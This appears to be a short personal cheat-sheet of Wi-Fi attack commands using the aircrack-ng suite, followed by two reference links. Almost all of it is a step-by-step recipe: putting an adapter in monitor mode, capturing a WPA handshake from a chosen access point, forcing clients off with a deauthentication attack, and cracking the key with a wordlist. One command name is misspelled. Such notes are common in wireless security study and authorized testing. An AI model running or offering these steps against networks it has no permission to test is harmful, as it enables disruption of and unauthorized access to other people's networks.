📚 Wireless

Created: 12.10.2020

Attacks

iwconfig

airmon-ng check kill

airmon-ng start wlan0

iwconfig

airodump-ng wlan0mon

airdump-ng -c <channel number> --bssid <access point MAC> -w capture wlan0mon to capture the handshake or enough data to deduce the key. To speed up - deauth attack (temp disassociate the client).

aireplay-ng -0 1 -a <MAC of AP> -c <client MAC> <interface> along with the above command still running. Look at capure file. Get a dictionary of weak passwords or some probable options, crack with hashcat or aircrack-ng -w <wordlist> -b <MAC> <capturefile>.

References

https://www.amazon.com/gp/product/1733003924/ref=ox_sc_act_title_1?smid=ATVPDKIKX0DER&psc=1

https://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles.html